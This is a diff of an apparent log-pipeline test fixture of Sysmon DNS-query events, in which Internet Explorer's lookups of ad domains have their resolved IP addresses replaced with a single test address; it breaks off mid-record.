"provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029339900Z'/\u003e\u003cEventRecordID\u003e92\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.809\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead.l.doubleclick.net;::ffff:172.217.10.34;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029339900Z'/\u003e\u003cEventRecordID\u003e92\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.809\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22" }, "winlog": { @@ -1370,7 +1370,7 @@ }, "event_data": { "QueryStatus": "0", - "QueryResults": "type: 5 pagead.l.doubleclick.net;::ffff:172.217.10.34;", + "QueryResults": "type: 5 pagead.l.doubleclick.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.809", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -1389,7 +1389,7 @@ { "@timestamp": "2021-05-05T15:30:51.696Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029350100Z'/\u003e\u003cEventRecordID\u003e93\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.821\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.adsrvr.org\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 match-975362022.us-east-1.elb.amazonaws.com;::ffff:54.208.129.24;::ffff:54.175.5.93;::ffff:52.86.210.96;::ffff:3.93.252.59;::ffff:54.86.97.130;::ffff:34.194.239.194;::ffff:3.94.67.102;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029350100Z'/\u003e\u003cEventRecordID\u003e93\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.821\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.adsrvr.org\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 match-975362022.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -1401,7 +1401,7 @@ }, "event_data": { "QueryStatus": "0", - "QueryResults": "type: 5 match-975362022.us-east-1.elb.amazonaws.com;::ffff:54.208.129.24;::ffff:54.175.5.93;::ffff:52.86.210.96;::ffff:3.93.252.59;::ffff:54.86.97.130;::ffff:34.194.239.194;::ffff:3.94.67.102;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;", + "QueryResults": "type: 5 match-975362022.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.821", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -1428,7 +1428,7 @@ { "@timestamp": "2021-05-05T15:30:51.696Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029358900Z'/\u003e\u003cEventRecordID\u003e94\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.821\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003essum-sec.casalemedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ssum-sec.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:23.52.162.21;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029358900Z'/\u003e\u003cEventRecordID\u003e94\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.821\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003essum-sec.casalemedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ssum-sec.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -1447,7 +1447,7 @@ "ProcessId": "2736", "QueryName": "ssum-sec.casalemedia.com", "QueryStatus": "0", - "QueryResults": "type: 5 ssum-sec.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:23.52.162.21;" + "QueryResults": "type: 5 ssum-sec.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:89.160.20.156;" }, "level": "information", "process": { @@ -1467,7 +1467,7 @@ { "@timestamp": "2021-05-05T15:30:51.696Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029369500Z'/\u003e\u003cEventRecordID\u003e95\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.828\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eprotected-by.clarium.io\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 adserver-clarium-446793891.us-east-1.elb.amazonaws.com;::ffff:18.204.130.216;::ffff:18.209.246.43;::ffff:107.23.153.61;::ffff:18.235.141.27;::ffff:3.210.79.248;::ffff:18.209.146.43;::ffff:18.210.64.206;::ffff:18.214.161.226;192.5.6.30;2001:503:a83e::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029369500Z'/\u003e\u003cEventRecordID\u003e95\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.828\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eprotected-by.clarium.io\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 adserver-clarium-446793891.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" @@ -1491,7 +1491,7 @@ "ProcessId": "2736", "QueryName": "protected-by.clarium.io", "QueryStatus": "0", - "QueryResults": "type: 5 adserver-clarium-446793891.us-east-1.elb.amazonaws.com;::ffff:18.204.130.216;::ffff:18.209.246.43;::ffff:107.23.153.61;::ffff:18.235.141.27;::ffff:3.210.79.248;::ffff:18.209.146.43;::ffff:18.210.64.206;::ffff:18.214.161.226;192.5.6.30;2001:503:a83e::2:30;", + "QueryResults": "type: 5 adserver-clarium-446793891.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "process": { @@ -1509,7 +1509,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029379000Z'/\u003e\u003cEventRecordID\u003e96\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.838\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epagead2.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead46.l.doubleclick.net;::ffff:172.217.10.66;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029379000Z'/\u003e\u003cEventRecordID\u003e96\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.838\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epagead2.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead46.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -1534,7 +1534,7 @@ "ProcessId": "2736", "QueryName": "pagead2.googlesyndication.com", "QueryStatus": "0", - "QueryResults": "type: 5 pagead46.l.doubleclick.net;::ffff:172.217.10.66;", + "QueryResults": "type: 5 pagead46.l.doubleclick.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "process": { @@ -1554,7 +1554,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029388500Z'/\u003e\u003cEventRecordID\u003e97\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.839\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egoogleads.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead46.l.doubleclick.net;::ffff:172.217.10.66;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029388500Z'/\u003e\u003cEventRecordID\u003e97\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.839\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egoogleads.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead46.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" }, "winlog": { "process": { @@ -1583,7 +1583,7 @@ "ProcessId": "2736", "QueryName": "googleads.g.doubleclick.net", "QueryStatus": "0", - "QueryResults": "type: 5 pagead46.l.doubleclick.net;::ffff:172.217.10.66;" + "QueryResults": "type: 5 pagead46.l.doubleclick.net;::ffff:89.160.20.156;" } } }, @@ -1593,7 +1593,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029398800Z'/\u003e\u003cEventRecordID\u003e98\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.841\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.advertising.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 prod.ups-adcom.aolp-ds-prd.aws.oath.cloud;type: 5 prod.ups-us-east-1.aolp-ds-prd.aws.oath.cloud;::ffff:52.22.184.73;::ffff:54.152.30.174;::ffff:3.213.70.197;::ffff:54.158.57.141;::ffff:52.6.39.34;::ffff:52.0.113.251;::ffff:3.213.8.28;::ffff:3.215.246.105;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029398800Z'/\u003e\u003cEventRecordID\u003e98\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.841\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.advertising.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 prod.ups-adcom.aolp-ds-prd.aws.oath.cloud;type: 5 